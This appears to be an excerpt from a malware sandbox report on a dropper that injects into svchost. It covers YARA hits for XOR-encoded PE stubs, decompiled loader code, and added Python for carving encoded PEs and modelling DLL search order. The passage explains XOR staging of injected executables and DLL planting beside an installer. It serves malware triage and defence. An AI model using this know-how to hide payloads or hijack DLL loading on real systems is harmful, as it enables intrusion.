• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000019.00000000.364403941.000002216B8B0000.00000040.00000001.sdmp, Author: Florian Roth

General

Start time: 12:49:42
Start date: 24/10/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule
Imagebase: 0x7ff70d6e0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001B.00000002.832381229.000002743A320000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001B.00000000.373121190.000002743A320000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001B.00000003.369691335.000002743A2B0000.00000004.00000001.sdmp, Author: Florian Roth

General

Start time: 12:49:46
Start date: 24/10/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k netsvcs -p -s seclogon
Imagebase: 0x7ff70d6e0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001C.00000002.813715548.000001111AC00000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001C.00000000.376992650.000001111AC00000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001C.00000003.376362360.000001111A990000.00000004.00000001.sdmp, Author: Florian Roth

General

Start time: 12:49:48
Start date: 24/10/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k netsvcs -p -s SENS
Imagebase: 0x7ff70d6e0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001D.00000003.379846771.0000022F12180000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001D.00000002.816236528.0000022F12740000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001D.00000000.380584076.0000022F12740000.00000040.00000001.sdmp, Author: Florian Roth

General

Start time: 12:49:50
Start date: 24/10/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k netsvcs -p -s ShellHWDetection
Imagebase: 0x7ff70d6e0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001E.00000003.383962907.000001BE5C730000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001E.00000000.384736630.000001BE5CD40000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001E.00000002.817922653.000001BE5CD40000.00000040.00000001.sdmp, Author: Florian Roth

General

Start time: 12:49:52
Start date: 24/10/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k netsvcs -p -s Themes
Imagebase: 0x7ff70d6e0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001F.00000000.389374530.0000021C23140000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001F.00000003.387366099.0000021C22B80000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001F.00000002.812231248.0000021C23140000.00000040.00000001.sdmp, Author: Florian Roth

General

Start time: 12:49:55
Start date: 24/10/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
Imagebase: 0x7ff70d6e0000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000022.00000000.397199381.00000202B28F0000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000022.00000002.818183114.00000202B28F0000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000022.00000003.395183978.00000202B2880000.00000004.00000001.sdmp, Author: Florian Roth

                                                                                  General

                                                                                  Start time:12:49:58
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000025.00000000.402119778.000001AFBA170000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000025.00000002.820529720.000001AFBA170000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000025.00000003.400991197.000001AFBA100000.00000004.00000001.sdmp, Author: Florian Roth

                                                                                  General

                                                                                  Start time:12:50:00
                                                                                  Start date:24/10/2021
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p
                                                                                  Imagebase:0x7ff70d6e0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000026.00000002.829615785.0000025C96C80000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000026.00000003.406745863.0000025C96370000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000026.00000000.409308294.0000025C96C80000.00000040.00000001.sdmp, Author: Florian Roth
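
Each of the svchost.exe instances above carries the same YARA hit in two memory regions. Reading the fifth field of the dump name as the region protection (which agrees with the 0x20, PAGE_EXECUTE_READ, seen on the sample's own .text region in the dump sources further down), one hit sits in a 0x40 PAGE_EXECUTE_READWRITE region and one in a 0x04 PAGE_READWRITE region. The rule (Florian Roth) matches the MS-DOS stub text "This program cannot be run in DOS mode" under YARA's `xor` modifier, i.e. encoded with any single-byte key, which is what an XOR-wrapped PE staged in another process looks like before it is decoded and mapped. The script below is an added example of mine, not code from the sandbox report or from the rule's author: it brute-forces the key, reports every encoded stub, and decodes back to the preceding `MZ` so the region can be carved for a PE parser. The memory dump it scans is constructed inline, and the Borland stub text is an extra needle of mine (the decompiled code in this report is Delphi-style), not a quote of the rule.

```python
"""Triage helper for SUSP_XORed_MSDOS_Stub_Message hits (added example).

Reproduces the rule's idea in plain Python: look for the DOS stub message under
every single-byte XOR key, then recover the XORed DOS header in front of it.
Input is a constructed buffer, not one of the report's .sdmp files.
"""

STUBS = {
    "msdos": b"This program cannot be run in DOS mode",
    # Borland/Delphi linkers emit this variant; included as an assumption of
    # mine because the decompiled code in the report is Delphi-style.
    "borland": b"This program must be run under Win32",
}


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def find_xored_stubs(buf: bytes):
    """Return sorted (offset, key, kind) for every single-byte XOR encoding of a
    stub message in buf. Key 0x00 (plaintext) is deliberately skipped: a normally
    mapped PE is expected in process memory and is not what the hunt is for."""
    hits = []
    for kind, stub in STUBS.items():
        for key in range(1, 256):
            needle = xor_bytes(stub, key)
            pos = buf.find(needle)
            while pos >= 0:
                hits.append((pos, key, kind))
                pos = buf.find(needle, pos + 1)
    return sorted(hits)


def recover_pe_header(buf: bytes, stub_off: int, key: int) -> bytes:
    """Decode from the nearest preceding XORed 'MZ' through the stub message,
    so the analyst can confirm a real DOS header sits in front of the text."""
    mz_off = buf.rfind(xor_bytes(b"MZ", key), 0, stub_off)
    if mz_off < 0:
        return b""
    return xor_bytes(buf[mz_off:stub_off + 64], key)


def scan_dump(buf: bytes) -> dict:
    """Triage one memory region: all encoded stubs plus the decoded header of the
    first hit (the carve point for a PE parser)."""
    hits = find_xored_stubs(buf)
    result = {"hits": hits, "header": b""}
    if hits:
        off, key, _ = hits[0]
        result["header"] = recover_pe_header(buf, off, key)
    return result


def build_fake_dump(key: int) -> bytes:
    """Constructed test input: a minimal DOS header and stub, XORed with `key`,
    surrounded by unencoded filler so the offsets are non-trivial."""
    dos_header = b"MZ" + bytes(0x3E)                 # e_magic plus zeroed header fields
    stub = bytes(range(0x10)) + STUBS["msdos"] + b".\r\r\n$\x00"
    return bytes(0x200) + xor_bytes(dos_header + stub, key) + bytes(0x100)


if __name__ == "__main__":
    dump = build_fake_dump(0x5A)
    res = scan_dump(dump)
    for off, key, kind in res["hits"]:
        print(f"{kind} stub at 0x{off:x}, key 0x{key:02x}")
    print(res["header"][:2], hex(res["header"].find(STUBS["msdos"])))
```

This is a hunting rule (the SUSP_ prefix is deliberate): any XOR-wrapped PE, including legitimately packed resources in benign software, will trigger it. What makes the hits meaningful here is the context the report already gives: they are inside svchost.exe instances started as ordinary netsvcs service hosts, next to the foreign-memory write, remote-thread and firmware-table signatures listed at the top of the report. A hit without that context is a lead, not a verdict.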

                                                                                  Disassembly

                                                                                  Code Analysis

                                                                                    Executed Functions

                                                                                    C-Code - Quality: 73%
                                                                                    			E004B5114(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                    				char _v8;
                                                                                    				char _v12;
                                                                                    				char _v16;
                                                                                    				char _v20;
                                                                                    				char _v24;
                                                                                    				char _v28;
                                                                                    				char _v32;
                                                                                    				char _v36;
                                                                                    				char _v40;
                                                                                    				char _v44;
                                                                                    				char _v48;
                                                                                    				char _v52;
                                                                                    				char _v56;
                                                                                    				char _v60;
                                                                                    				long _t39;
                                                                                    				_Unknown_base(*)()* _t42;
                                                                                    				_Unknown_base(*)()* _t43;
                                                                                    				_Unknown_base(*)()* _t46;
                                                                                    				signed int _t51;
                                                                                    				void* _t111;
                                                                                    				void* _t112;
                                                                                    				intOrPtr _t129;
                                                                                    				struct HINSTANCE__* _t148;
                                                                                    				intOrPtr* _t150;
                                                                                    				intOrPtr _t152;
                                                                                    				intOrPtr _t153;
                                                                                    
                                                                                    				_t152 = _t153;
                                                                                    				_t112 = 7;
                                                                                    				do {
                                                                                    					_push(0);
                                                                                    					_push(0);
                                                                                    					_t112 = _t112 - 1;
                                                                                    				} while (_t112 != 0);
                                                                                    				_push(_t152);
                                                                                    				_push(0x4b5388);
                                                                                    				_push( *[fs:eax]);
                                                                                    				 *[fs:eax] = _t153;
                                                                                    				 *0x4be664 =  *0x4be664 - 1;
                                                                                    				if( *0x4be664 >= 0) {
                                                                                    					L19:
                                                                                    					_pop(_t129);
                                                                                    					 *[fs:eax] = _t129;
                                                                                    					_push(0x4b538f);
                                                                                    					return E00407A80( &_v60, 0xe);
                                                                                    				} else {
                                                                                    					_t148 = GetModuleHandleW(L"kernel32.dll");
                                                                                    					_t39 = GetVersion();
                                                                                    					_t111 = 0;
                                                                                    					if(_t39 != 0x600) {
                                                                                    						_t150 = GetProcAddress(_t148, "SetDefaultDllDirectories");
                                                                                    						if(_t150 != 0) {
                                                                                    							 *_t150(0x800);
                                                                                    							asm("sbb ebx, ebx");
                                                                                    							_t111 = 1;
                                                                                    						}
                                                                                    					}
                                                                                    					if(_t111 == 0) {
                                                                                    						_t46 = GetProcAddress(_t148, "SetDllDirectoryW");
                                                                                    						if(_t46 != 0) {
                                                                                    							 *_t46(0x4b53e4);
                                                                                    						}
                                                                                    						E0040E520( &_v8);
                                                                                    						E00407E00(0x4be668, _v8);
                                                                                    						if( *0x4be668 != 0) {
                                                                                    							_t51 =  *0x4be668;
                                                                                    							if(_t51 != 0) {
                                                                                    								_t51 =  *(_t51 - 4);
                                                                                    							}
                                                                                    							if( *((short*)( *0x4be668 + _t51 * 2 - 2)) != 0x5c) {
                                                                                    								E004086E4(0x4be668, 0x4b53f4);
                                                                                    							}
                                                                                    							E0040873C( &_v12, L"uxtheme.dll",  *0x4be668);
                                                                                    							E0040E54C(_v12, _t111);
                                                                                    							E0040873C( &_v16, L"userenv.dll",  *0x4be668);
                                                                                    							E0040E54C(_v16, _t111);
                                                                                    							E0040873C( &_v20, L"setupapi.dll",  *0x4be668);
                                                                                    							E0040E54C(_v20, _t111);
                                                                                    							E0040873C( &_v24, L"apphelp.dll",  *0x4be668);
                                                                                    							E0040E54C(_v24, _t111);
                                                                                    							E0040873C( &_v28, L"propsys.dll",  *0x4be668);
                                                                                    							E0040E54C(_v28, _t111);
                                                                                    							E0040873C( &_v32, L"dwmapi.dll",  *0x4be668);
                                                                                    							E0040E54C(_v32, _t111);
                                                                                    							E0040873C( &_v36, L"cryptbase.dll",  *0x4be668);
                                                                                    							E0040E54C(_v36, _t111);
                                                                                    							E0040873C( &_v40, L"oleacc.dll",  *0x4be668);
                                                                                    							E0040E54C(_v40, _t111);
                                                                                    							E0040873C( &_v44, L"version.dll",  *0x4be668);
                                                                                    							E0040E54C(_v44, _t111);
                                                                                    							E0040873C( &_v48, L"profapi.dll",  *0x4be668);
                                                                                    							E0040E54C(_v48, _t111);
                                                                                    							E0040873C( &_v52, L"comres.dll",  *0x4be668);
                                                                                    							E0040E54C(_v52, _t111);
                                                                                    							E0040873C( &_v56, L"clbcatq.dll",  *0x4be668);
                                                                                    							E0040E54C(_v56, _t111);
                                                                                    							E0040873C( &_v60, L"ntmarta.dll",  *0x4be668);
                                                                                    							E0040E54C(_v60, _t111);
                                                                                    						}
                                                                                    					}
                                                                                    					_t42 = GetProcAddress(_t148, "SetSearchPathMode");
                                                                                    					if(_t42 != 0) {
                                                                                    						 *_t42(0x8001);
                                                                                    					}
                                                                                    					_t43 = GetProcAddress(_t148, "SetProcessDEPPolicy");
                                                                                    					if(_t43 != 0) {
                                                                                    						 *_t43(1); // executed
                                                                                    					}
                                                                                    					goto L19;
                                                                                    				}
                                                                                    			}

                                                                                    Instruction addresses for the listing above (the address column that extraction separated from the C-code; in listing order, so the call sites cited under APIs fall in this range):
                                                                                    0x004b5115 0x004b5117 0x004b511c 0x004b511c 0x004b511e 0x004b5120 0x004b5120 0x004b5128
                                                                                    0x004b5129 0x004b512e 0x004b5131 0x004b5134 0x004b513b 0x004b536d 0x004b536f 0x004b5372
                                                                                    0x004b5375 0x004b5387 0x004b5141 0x004b514b 0x004b514d 0x004b5154 0x004b515a 0x004b5167
                                                                                    0x004b516b 0x004b5172 0x004b5177 0x004b5179 0x004b5179 0x004b516b 0x004b517c 0x004b5188
                                                                                    0x004b518f 0x004b5196 0x004b5196 0x004b519b 0x004b51a8 0x004b51b4 0x004b51ba 0x004b51c1
                                                                                    0x004b51c6 0x004b51c6 0x004b51d4 0x004b51e0 0x004b51e0 0x004b51f3 0x004b51fb 0x004b520e
                                                                                    0x004b5216 0x004b5229 0x004b5231 0x004b5244 0x004b524c 0x004b525f 0x004b5267 0x004b527a
                                                                                    0x004b5282 0x004b5295 0x004b529d 0x004b52b0 0x004b52b8 0x004b52cb 0x004b52d3 0x004b52e6
                                                                                    0x004b52ee 0x004b5301 0x004b5309 0x004b531c 0x004b5324 0x004b5337 0x004b533f 0x004b533f
                                                                                    0x004b51b4 0x004b534a 0x004b5351 0x004b5358 0x004b5358 0x004b5360 0x004b5367 0x004b536b
                                                                                    0x004b536b 0x00000000 0x004b5367

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B5146
                                                                                    • GetVersion.KERNEL32(kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B514D
                                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004B5162
                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004B5188
                                                                                      • Part of subcall function 0040E54C: SetErrorMode.KERNEL32(00008000), ref: 0040E55A
                                                                                      • Part of subcall function 0040E54C: LoadLibraryW.KERNEL32(00000000,00000000,0040E5AE,?,00000000,0040E5CC,?,00008000), ref: 0040E58F
                                                                                    • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004B534A
                                                                                    • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004B5360
                                                                                    • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B536B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: AddressProc$ErrorHandleLibraryLoadModeModulePolicyProcessVersion
                                                                                    • String ID: SetDefaultDllDirectories$SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$apphelp.dll$clbcatq.dll$comres.dll$cryptbase.dll$dwmapi.dll$hK$hK$kernel32.dll$ntmarta.dll$oleacc.dll$profapi.dll$propsys.dll$setupapi.dll$userenv.dll$uxtheme.dll$version.dll
                                                                                    • API String ID: 2248137261-3182217745
                                                                                    • Opcode ID: 68b2adb77f8f7151d30e1a894141e6e7486eaa9f98baa6450b00b79ea83e97ab
                                                                                    • Instruction ID: 14362f36823de93a6bafc63c1bb5288ecf7b8ac372eee3bc1917329a49ba756d
                                                                                    • Opcode Fuzzy Hash: 68b2adb77f8f7151d30e1a894141e6e7486eaa9f98baa6450b00b79ea83e97ab
                                                                                    • Instruction Fuzzy Hash: 57513C34601504ABE701EBA6DC82FDEB3A5AB94348BA4493BE40077395DF7C9D428B6D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
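
E004B5114 is a loader-hardening prologue, run once (the `*0x4be664` counter) before the program's real work. Read against the API list: it calls SetDefaultDllDirectories(0x800), i.e. LOAD_LIBRARY_SEARCH_SYSTEM32, when the export exists and the OS is not the one version excluded by the `GetVersion() != 0x600` check; on success (`_t111 = 1`) the preload block is skipped entirely. Otherwise it calls SetDllDirectoryW with a fixed string, then loads thirteen named DLLs (uxtheme, userenv, setupapi, apphelp, propsys, dwmapi, cryptbase, oleacc, version, profapi, comres, clbcatq, ntmarta) from one directory computed by E0040E520 (the report does not name it; the pattern points to the system directory), with SetErrorMode(0x8000, SEM_NOOPENFILEERRORBOX) around each LoadLibraryW. Finally SetSearchPathMode(0x8001 = BASE_SEARCH_PATH_ENABLE_SAFE_SEARCHMODE | BASE_SEARCH_PATH_PERMANENT) and SetProcessDEPPolicy(1, PROCESS_DEP_ENABLE). This is the DLL-hijack and DEP hardening that installer frameworks ship by default; it tells you the dropper was built with a hardened toolchain, not anything about the payload. The model below is an added example of mine, not the page's or the sample's code. It follows Microsoft's documented DLL search order for desktop applications, assumes the SetDllDirectoryW argument at 0x4b53e4 is the empty string (which removes the current directory from the order; the listing does not resolve it), and omits KnownDLLs and the 16-bit system directory. Its point is the reason the preload exists: SafeDllSearchMode and SetDllDirectory("") still leave the application directory first, so an attacker's version.dll beside the installer wins unless the real one is already loaded or the default directories are restricted to System32.

```python
"""Model of the Windows DLL search order (added example, not the sample's code).

Shows why E004B5114 preloads system DLLs by full path and, where available,
restricts the default directories to System32: an already-loaded module wins
over every search path, and LOAD_LIBRARY_SEARCH_SYSTEM32 drops the
application directory from the order. Directory contents are constructed.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

APP_DIR = r"C:\Users\victim\Downloads"          # directory of the executable
CWD = r"C:\Users\victim\Downloads"              # current directory (same here)
SYSTEM_DIR = r"C:\Windows\System32"
WINDOWS_DIR = r"C:\Windows"
PATH_DIRS = [r"C:\Tools"]

# Flag values as they appear in the decompiled prologue
LOAD_LIBRARY_SEARCH_APPLICATION_DIR = 0x200
LOAD_LIBRARY_SEARCH_SYSTEM32 = 0x800           # SetDefaultDllDirectories(0x800)
BASE_SEARCH_PATH_ENABLE_SAFE_SEARCHMODE = 0x1  # SetSearchPathMode(0x8001) = 0x8000 | 0x1
BASE_SEARCH_PATH_PERMANENT = 0x8000

# The thirteen DLLs E004B5114 loads explicitly before anything else runs
PRELOAD = ["uxtheme.dll", "userenv.dll", "setupapi.dll", "apphelp.dll",
           "propsys.dll", "dwmapi.dll", "cryptbase.dll", "oleacc.dll",
           "version.dll", "profapi.dll", "comres.dll", "clbcatq.dll", "ntmarta.dll"]


@dataclass
class Loader:
    fs: Dict[str, Set[str]]                      # directory -> DLL names present
    safe_search: bool = True                     # SafeDllSearchMode, on by default
    dll_directory: Optional[str] = CWD           # SetDllDirectory(); "" removes CWD
    default_dirs: int = 0                        # SetDefaultDllDirectories() flags
    loaded: Dict[str, str] = field(default_factory=dict)   # module name -> path

    def search_order(self) -> List[str]:
        """Directories consulted for a bare DLL name, in order."""
        if self.default_dirs:                    # SetDefaultDllDirectories() in effect
            dirs = []
            if self.default_dirs & LOAD_LIBRARY_SEARCH_APPLICATION_DIR:
                dirs.append(APP_DIR)
            if self.default_dirs & LOAD_LIBRARY_SEARCH_SYSTEM32:
                dirs.append(SYSTEM_DIR)
            return dirs                          # 0x800 alone: System32 only
        cwd = [self.dll_directory] if self.dll_directory else []
        order = [APP_DIR]
        if not self.safe_search:
            order += cwd                         # legacy order: CWD second
        order += [SYSTEM_DIR, WINDOWS_DIR]
        if self.safe_search:
            order += cwd                         # safe mode: CWD after system dirs
        return order + PATH_DIRS

    def load_library(self, name: str, explicit_dir: Optional[str] = None) -> Optional[str]:
        """LoadLibrary semantics: a module already loaded under that name wins
        regardless of path; otherwise search (or use the explicit directory)."""
        key = name.lower()
        if key in self.loaded:
            return self.loaded[key]
        candidates = [explicit_dir] if explicit_dir else self.search_order()
        for d in candidates:
            if key in {n.lower() for n in self.fs.get(d, ())}:
                self.loaded[key] = d + "\\" + name
                return self.loaded[key]
        return None


def planted_fs() -> Dict[str, Set[str]]:
    # Constructed: the attacker drops version.dll next to the installer.
    return {APP_DIR: {"installer.exe", "version.dll"},
            SYSTEM_DIR: set(PRELOAD),
            r"C:\Tools": {"helper.dll"}}


def unhardened() -> Optional[str]:
    """Plain process, SafeDllSearchMode on: the planted DLL still wins."""
    return Loader(planted_fs()).load_library("version.dll")


def hardened_by_default_dirs() -> Optional[str]:
    """The SetDefaultDllDirectories(0x800) path taken when the API exists."""
    ld = Loader(planted_fs())
    ld.default_dirs = LOAD_LIBRARY_SEARCH_SYSTEM32
    return ld.load_library("version.dll")


def hardened_by_preload() -> Optional[str]:
    """The fallback path: SetDllDirectoryW("") (assumed argument) plus the
    explicit preload of each DLL from the system directory."""
    ld = Loader(planted_fs())
    ld.dll_directory = ""
    for dll in PRELOAD:                          # E0040E54C: LoadLibraryW(dir + name)
        ld.load_library(dll, explicit_dir=SYSTEM_DIR)
    return ld.load_library("version.dll")        # later implicit load hits the loaded copy


if __name__ == "__main__":
    print("unhardened       :", unhardened())
    print("default dirs     :", hardened_by_default_dirs())
    print("preload fallback :", hardened_by_preload())
```

Two details the model makes visible. First, 0x800 alone excludes the application directory as well as the current directory, which is why the sample can skip the preload when that call succeeds. Second, the preload only protects the names on the list: any DLL the program (or a library it uses) loads later by bare name and that is not a KnownDLL is still resolved through the application directory first, so a planted DLL with a different name is not covered by this prologue.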

                                                                                    C-Code - Quality: 100%
                                                                                    			E004AF91C(void* __eax) {
                                                                                    				char _v44;
                                                                                    				struct _SYSTEM_INFO _v80;
                                                                                    				long _v84;
                                                                                    				char _v88;
                                                                                    				long _t22;
                                                                                    				int _t28;
                                                                                    				void* _t37;
                                                                                    				struct _MEMORY_BASIC_INFORMATION* _t40;
                                                                                    				long _t41;
                                                                                    				void** _t42;
                                                                                    
                                                                                    				_t42 =  &(_v80.dwPageSize);
                                                                                    				 *_t42 = __eax;
                                                                                    				_t40 =  &_v44;
                                                                                    				GetSystemInfo( &_v80); // executed
                                                                                    				_t22 = VirtualQuery( *_t42, _t40, 0x1c);
                                                                                    				if(_t22 == 0) {
                                                                                    					L17:
                                                                                    					return _t22;
                                                                                    				} else {
                                                                                    					while(1) {
                                                                                    						_t22 = _t40->AllocationBase;
                                                                                    						if(_t22 !=  *_t42) {
                                                                                    							goto L17;
                                                                                    						}
                                                                                    						if(_t40->State != 0x1000 || (_t40->Protect & 0x00000001) != 0) {
                                                                                    							L15:
                                                                                    							_t22 = VirtualQuery(_t40->BaseAddress + _t40->RegionSize, _t40, 0x1c);
                                                                                    							if(_t22 == 0) {
                                                                                    								goto L17;
                                                                                    							}
                                                                                    							continue;
                                                                                    						} else {
                                                                                    							_v88 = 0;
                                                                                    							_t41 = _t40->Protect;
                                                                                    							if(_t41 == 1 || _t41 == 2 || _t41 == 0x10 || _t41 == 0x20) {
                                                                                    								_t28 = VirtualProtect(_t40->BaseAddress, _t40->RegionSize, 0x40,  &_v84); // executed
                                                                                    								if(_t28 != 0) {
                                                                                    									_v88 = 1;
                                                                                    								}
                                                                                    							}
                                                                                    							_t37 = 0;
                                                                                    							while(_t37 < _t40->RegionSize) {
                                                                                    								E004AF914(_t40->BaseAddress + _t37);
                                                                                    								_t37 = _t37 + _v80.dwPageSize;
                                                                                    							}
                                                                                    							if(_v88 != 0) {
                                                                                    								VirtualProtect( *_t40, _t40->RegionSize, _v84,  &_v84); // executed
                                                                                    							}
                                                                                    							goto L15;
                                                                                    						}
                                                                                    					}
                                                                                    					goto L17;
                                                                                    				}
                                                                                     			}
                                                                                    0x004af920
                                                                                    0x004af923
                                                                                    0x004af926
                                                                                    0x004af92f
                                                                                    0x004af93b
                                                                                    0x004af942
                                                                                    0x004af9ee
                                                                                    0x004af9ee
                                                                                    0x004af948
                                                                                    0x004af9db
                                                                                    0x004af9db
                                                                                    0x004af9e1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004af954
                                                                                    0x004af9c7
                                                                                    0x004af9d2
                                                                                    0x004af9d9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004af95c
                                                                                    0x004af95c
                                                                                    0x004af961
                                                                                    0x004af967
                                                                                    0x004af986
                                                                                    0x004af98d
                                                                                    0x004af98f
                                                                                    0x004af98f
                                                                                    0x004af98d
                                                                                    0x004af994
                                                                                    0x004af9a5
                                                                                    0x004af99c
                                                                                    0x004af9a1
                                                                                    0x004af9a1
                                                                                    0x004af9af
                                                                                    0x004af9c2
                                                                                    0x004af9c2
                                                                                    0x00000000
                                                                                    0x004af9af
                                                                                    0x004af954
                                                                                    0x00000000
                                                                                    0x004af9db

                                                                                    APIs
                                                                                    • GetSystemInfo.KERNEL32(?), ref: 004AF92F
                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C,?), ref: 004AF93B
                                                                                    • VirtualProtect.KERNEL32(?,?,00000040,0000001C,?,?,0000001C), ref: 004AF986
